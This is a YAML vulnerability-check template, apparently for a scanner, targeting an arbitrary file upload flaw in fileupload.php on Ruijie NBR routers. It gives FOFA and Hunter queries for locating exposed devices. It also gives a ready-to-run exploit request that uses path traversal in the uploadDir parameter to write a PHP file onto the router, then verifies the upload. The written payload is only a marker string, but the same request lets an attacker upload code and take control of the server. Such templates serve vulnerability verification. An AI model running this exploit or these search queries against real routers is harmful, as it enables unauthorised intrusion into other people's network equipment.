product: 锐捷NBR路由器
vName: 锐捷NBR路由器 fileupload.php任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件到服务器获取服务器权限
version: ''
note: ''
search:
  FOFA: title="锐捷网络 --NBR路由器" && app="Ruijie-NBR路由器"
  Hunter: app.name=="Ruijie 锐捷 EWEB"
protocol: http
link: https://www.ewbang.com/community/article/details/961944194.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /ddi/server/fileupload.php?uploadDir=../../test&name=52e039302a62d077.php
      header:
        Content-Disposition: form-data; name="file"; filename="111.php"
        Content-Type: image/jpeg
      data: 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /test/52e039302a62d077.php
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and